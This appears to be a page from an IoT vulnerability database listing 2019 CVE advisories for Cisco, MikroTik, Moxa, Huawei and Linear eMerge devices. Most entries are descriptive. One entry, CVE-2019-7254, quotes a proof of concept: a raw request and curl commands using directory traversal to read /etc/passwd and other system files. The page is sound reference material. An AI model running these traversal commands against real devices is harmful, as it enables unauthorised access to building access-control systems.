VARIoT IoT vulnerabilities database
| VAR-201907-0235 | CVE-2019-1889 | Cisco Application Policy Infrastructure Controller Vulnerability in authorization, authority and access control in software |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
A vulnerability in the REST API for software device management in Cisco Application Policy Infrastructure Controller (APIC) Software could allow an authenticated, remote attacker to escalate privileges to root on an affected device. The vulnerability is due to incomplete validation and error checking for the file path when specific software is uploaded. An attacker could exploit this vulnerability by uploading malicious software using the REST API. A successful exploit could allow an attacker to escalate their privilege level to root. The attacker would need to have the administrator role on the device.
This issue is being tracked by Cisco Bug ID CSCvp64857. The vulnerability stems from the lack of effective permissions and access control measures in network systems or products.
| VAR-201907-0318 | CVE-2019-13074 | MikroTik router Vulnerable to resource exhaustion |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the FTP daemon on MikroTik routers through 6.44.3 could allow remote attackers to exhaust all available memory, causing the device to reboot because of uncontrolled resource management. MikroTik routers contain a resource exhaustion vulnerability. Service operation may be interrupted (DoS). MikroTik routers are router products from MikroTik, Latvia. There are security vulnerabilities in the FTP daemons of MikroTik routers 6.44.3 and earlier.
| VAR-201907-1151 | CVE-2018-12715 | DIGISOL SYSTEMS DG-HR3400 Cross-Site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
DIGISOL DG-HR3400 devices have XSS via a modified SSID when the apssid value is unchanged. The DIGISOL DG-HR3400 device contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. DIGISOL SYSTEMS DG-HR3400 is a wireless router from DIGISOL SYSTEMS, India. A cross-site scripting vulnerability exists in DIGISOL SYSTEMS DG-HR3400. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client-side code.
| VAR-201907-1143 | CVE-2018-11422 | Moxa OnCell G3100-HSPA Series access control vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Moxa OnCell G3100-HSPA Series version 1.6 Build 17100315 and prior use a proprietary configuration protocol that does not provide confidentiality, integrity, and authenticity security controls. All information is sent in plain text, and can be intercepted and modified. Any commands (including device reboot, configuration download or upload, or firmware upgrade) are accepted and executed by the device without authentication. The Moxa OnCell G3100-HSPA series contains a vulnerability related to access control. Information may be obtained or altered, and service operation may be disrupted (DoS). Moxa OnCell G3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. A security feature issue vulnerability exists in Moxa OnCell G3100-HSPA 1.6 Build 17100315 and earlier. The vulnerability stems from the lack of security measures such as authentication, access control, and rights management in the network system or product. No further details of the vulnerability are currently provided.
| VAR-201907-1142 | CVE-2018-11421 | Moxa OnCell G3100-HSPA Information disclosure vulnerability in the series |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
Moxa OnCell G3100-HSPA Series version 1.6 Build 17100315 and prior use a proprietary monitoring protocol that does not provide confidentiality, integrity, and authenticity security controls. All information is sent in plain text, and can be intercepted and modified. The protocol is vulnerable to remote unauthenticated disclosure of sensitive information, including the administrator's password. Under certain conditions, it's also possible to retrieve additional information, such as content of HTTP requests to the device, or the previously used password, due to memory leakages. The Moxa OnCell G3100-HSPA series contains an information disclosure vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Moxa OnCell G3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. A security feature issue vulnerability exists in Moxa OnCell G3100-HSPA Series 1.6 Build 17100315 and earlier. The vulnerability stems from the lack of security measures such as authentication, access control, and rights management in the network system or product. No further details of the vulnerability are currently provided.
| VAR-201907-1141 | CVE-2018-11420 | Moxa OnCell G3100-HSPA Vulnerability related to resource depletion in the series |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
There is memory corruption in the web interface of Moxa OnCell G3100-HSPA Series version 1.5 Build 17042015 and prior, a different vulnerability than CVE-2018-11423. The Moxa OnCell G3100-HSPA series contains a resource exhaustion vulnerability. This is a different vulnerability from CVE-2018-11423. Information may be obtained or altered, and service operation may be disrupted (DoS). Moxa OnCell G3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. An attacker could exploit this vulnerability to corrupt memory.
| VAR-201907-1145 | CVE-2018-11424 | Moxa OnCell G3470A-LTE In the series NULL Pointer dereference vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
There is memory corruption in the web interface of Moxa OnCell G3470A-LTE Series version 1.6 Build 18021314 and prior, a different vulnerability than CVE-2018-11425. The Moxa OnCell G3470A-LTE series contains a vulnerability related to NULL pointer dereference. This is a different vulnerability from CVE-2018-11425. Service operation may be interrupted (DoS). Moxa OnCell G3470A-LTE is a G3470A-LTE series cellular network gateway device from Moxa Corporation of Taiwan, China. An attacker could exploit this vulnerability to corrupt memory.
| VAR-201907-1144 | CVE-2018-11423 | Moxa OnCell G3100-HSPA Series buffer error vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
There is memory corruption in the web interface of Moxa OnCell G3100-HSPA Series version 1.6 Build 17100315 and prior, a different vulnerability than CVE-2018-11420. The Moxa OnCell G3100-HSPA series contains a buffer error vulnerability. This is a different vulnerability from CVE-2018-11420. Service operation may be interrupted (DoS). Moxa OnCell G3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. An attacker could exploit this vulnerability to corrupt memory.
| VAR-201907-1148 | CVE-2018-11427 | Moxa OnCell G3100-HSPA Cross-Site Request Forgery Vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
CSRF tokens are not used in the web application of Moxa OnCell G3100-HSPA Series version 1.4 Build 16062919 and prior, which makes it possible to perform CSRF attacks on the device administrator. The Moxa OnCell G3100-HSPA series contains a cross-site request forgery vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Moxa OnCell G3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. This vulnerability stems from the fact that the web application does not fully verify that the request is from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client.
| VAR-201907-1146 | CVE-2018-11425 | Moxa OnCell G3470A-LTE Series buffer error vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A memory corruption issue was discovered in Moxa OnCell G3470A-LTE Series version 1.6 Build 18021314 and prior, a different vulnerability than CVE-2018-11424. The Moxa OnCell G3470A-LTE series contains a buffer error vulnerability. This is a different vulnerability from CVE-2018-11424. Information may be obtained or altered, and service operation may be disrupted (DoS). Moxa OnCell G3470A-LTE is a G3470A-LTE series cellular network gateway device from Moxa Corporation of Taiwan, China. A memory corruption vulnerability exists in Moxa OnCell G3470A-LTE 1.6 Build 18021314 and earlier. An attacker could exploit this vulnerability to corrupt memory.
| VAR-201907-1147 | CVE-2018-11426 | Moxa OnCell G3100-HSPA Authentication vulnerability in the series |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A weak Cookie parameter is used in the web application of Moxa OnCell G3100-HSPA Series version 1.4 Build 16062919 and prior. An attacker can brute force parameters required to bypass authentication and access the web interface to use all its functions except for password change. There are authentication vulnerabilities in the Moxa OnCell G3100-HSPA series. Information may be obtained or altered, and service operation may be disrupted (DoS). Moxa OnCell G3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. A security vulnerability exists in Moxa OnCell G3100-HSPA 1.4 Build 16062919 and earlier.
| VAR-201907-0269 | CVE-2019-5221 | Huawei Mate 20 X Path Traversal Vulnerability |
CVSS V2: 3.3 CVSS V3: 6.5 Severity: MEDIUM |
There is a path traversal vulnerability on Huawei Share. The software does not properly validate the path. An attacker could craft a file path when transporting a file through Huawei Share; a successful exploit could allow the attacker to transport a file to an arbitrary path on the phone. Affected products: Mate 20 X versions earlier than Ever-L29B 9.1.0.300(C432E3R1P12), versions earlier than Ever-L29B 9.1.0.300(C636E3R2P1), and versions earlier than Ever-L29B 9.1.0.300(C185E3R3P1). Huawei Mate 20 X contains a path traversal vulnerability. Information may be tampered with. Huawei Mate 20 X is a smartphone from China's Huawei company.
| VAR-201907-0398 | CVE-2019-1931 | Cisco Firepower Management Center Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Multiple vulnerabilities in the RSS dashboard in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface of the affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
These issues are being tracked by Cisco Bug IDs CSCvo90805 and CSCvo92913.
| VAR-201907-0237 | CVE-2019-1891 | plural Cisco Small Business Series Managed Switch Vulnerability related to input validation in products |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the web interface of Cisco Small Business 200, 300, and 500 Series Managed Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper validation of requests sent to the web interface. An attacker could exploit this vulnerability by sending a malicious request to the web interface of an affected device. A successful exploit could allow the attacker to cause an unexpected reload of the device, resulting in a DoS condition.
This issue is being tracked by Cisco Bug IDs CSCvp43403 and CSCvp43417.
| VAR-201907-0395 | CVE-2019-1932 | Cisco Advanced Malware Protection for Endpoints Vulnerabilities related to insufficient validation of data reliability |
CVSS V2: 7.2 CVSS V3: 6.7 Severity: MEDIUM |
A vulnerability in Cisco Advanced Malware Protection (AMP) for Endpoints for Windows could allow an authenticated, local attacker with administrator privileges to execute arbitrary code. The vulnerability is due to insufficient validation of dynamically loaded modules. An attacker could exploit this vulnerability by placing a file in a specific location in the Windows filesystem. A successful exploit could allow the attacker to execute the code with the privileges of the AMP service.
This issue is being tracked by Cisco Bug ID CSCvp53361.
| VAR-201907-0232 | CVE-2019-1893 | Cisco Enterprise NFV Infrastructure Software Command injection vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system (OS) of an affected device as root. The vulnerability is due to insufficient input validation of a configuration file that is accessible to a local shell user. An attacker could exploit this vulnerability by including malicious input during the execution of this file. A successful exploit could allow the attacker to execute arbitrary commands on the underlying OS as root.
This issue is being tracked by Cisco Bug ID CSCvn12421. The platform can realize the full lifecycle management of virtualized services through the central coordinator and controller.
| VAR-201907-0233 | CVE-2019-1894 | Cisco Enterprise NFV Infrastructure Software Input validation vulnerability |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
A vulnerability in Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker with administrator privileges to overwrite or read arbitrary files on the underlying operating system (OS) of an affected device. The vulnerability is due to improper input validation in NFVIS filesystem commands. An attacker could exploit this vulnerability by using crafted variables during the execution of an affected command. A successful exploit could allow the attacker to overwrite or read arbitrary files on the underlying OS. Cisco Enterprise NFV Infrastructure Software (NFVIS) contains an input validation vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Cisco Enterprise NFV Infrastructure Software is prone to an arbitrary file-overwrite vulnerability.
This issue is being tracked by Cisco Bug ID CSCvn12407. The platform can realize the full lifecycle management of virtualized services through the central coordinator and controller.
| VAR-201907-0155 | CVE-2019-7254 | Linear eMerge E3 Vulnerabilities related to authorization, privileges, and access control in series devices |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Linear eMerge E3-Series devices allow File Inclusion. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control. Information may be obtained or tampered with, and service operation may be interrupted (DoS). A security vulnerability exists in Nortek Security & Control Linear eMerge E3-Series. Currently there is no information about this vulnerability; please keep an eye on CNNVD or vendor announcements.
Linear eMerge E3 Unauthenticated Directory Traversal File Disclosure
Affected version: <=1.00-06
CVE: CVE-2019-7254
Advisory: https://applied-risk.com/resources/ar-2019-005
by Gjoko 'LiquidWorm' Krstic
GET /?c=../../../../../../etc/passwd%00
Host: 192.168.1.2
curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version
curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue
curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00
| VAR-201907-0161 | CVE-2019-7260 | Linear eMerge E3 Vulnerabilities related to certificate/password management in series devices |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
Linear eMerge E3-Series devices have Cleartext Credentials in a Database. Linear eMerge E3 series devices contain a vulnerability related to certificate/password management. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.
Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. Attackers can use this vulnerability to obtain clear text passwords and launch further attacks on the system. Currently there is no information about this vulnerability; please keep an eye on CNNVD or vendor announcements.
| VAR-201907-0166 | CVE-2019-7265 | Linear eMerge E3 Vulnerabilities related to the use of hard-coded credentials in series devices |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Linear eMerge E3-Series devices allow Remote Code Execution (root access over SSH). Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could exploit this vulnerability to execute code.